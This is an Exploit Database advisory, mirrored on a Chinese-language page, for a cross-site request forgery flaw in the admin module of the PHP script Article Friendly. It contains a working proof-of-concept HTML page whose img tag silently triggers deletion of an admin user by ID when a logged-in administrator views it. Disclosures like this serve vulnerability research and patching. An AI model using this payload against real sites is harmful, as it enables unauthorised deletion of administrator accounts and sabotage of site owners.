Article Friendly – Cross-Site Request Forgery

• Exploit Database
• 13 阅读

• 作者： pratul agrawal
  日期： 2010-02-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11559/

•  =======================================================================
  
   Article friendly CSRF Vulnerability
  
   =======================================================================
  
   by
  
   Pratul Agrawal
  
  
  
  # Vulnerability found in- Admin module
  
  # email Pratulag@yahoo.com
  
  # company aksitservices
  
  # Credit by Pratul Agrawal
   
  # Site p4ge http://www.articlefriendly.com/
   
  # Plateform php
   
  
  
  # Proof of concept #
  
  Targeted URL:http://server/admin/index.php?filename=adminlogin
   
  
  Script to delete the Admin user through Cross Site request forgery
   
   ...................................................................................................................
   
  <html>
   
  <body>
   
  <img src=http://server/admin/index.php?filename=adminuser&a=3&adminid=[USER ID] />
   
  </body>
   
  </html>
   
   
   ...................................................................................................................
   
   
   
  After execution refresh the page and u can see that user having giving IDget deleted automatically.
  
  
  #If you have any questions, comments, or concerns, feel free to contact me.